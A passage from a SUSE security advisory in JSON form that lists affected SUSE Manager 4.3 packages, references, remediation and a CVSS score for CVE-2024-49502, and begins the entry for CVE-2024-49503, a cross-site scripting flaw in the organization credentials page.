"SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch",
"SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-49502",
"url": "https://www.suse.com/security/cve/CVE-2024-49502"
},
{
"category": "external",
"summary": "SUSE Bug 1231852 for CVE-2024-49502",
"url": "https://bugzilla.suse.com/1231852"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch",
"SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch",
"SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch",
"SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch",
"SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-11-18T13:19:53Z",
"details": "low"
}
],
"title": "CVE-2024-49502"
},
{
"cve": "CVE-2024-49503",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-49503"
}
],
"notes": [
{
"category": "general",
"text": "A Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027) vulnerability in SUSE manager allows attackers to execute Javascript code in the organization credentials sub page.\nThis issue affects Container suse/manager/5.0/x86_64/server:5.0.2.7.8.1: before 5.0.15-150600.3.10.2; SUSE Manager Server Module 4.3: before 4.3.42-150400.3.52.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch",
"SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch",
"SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
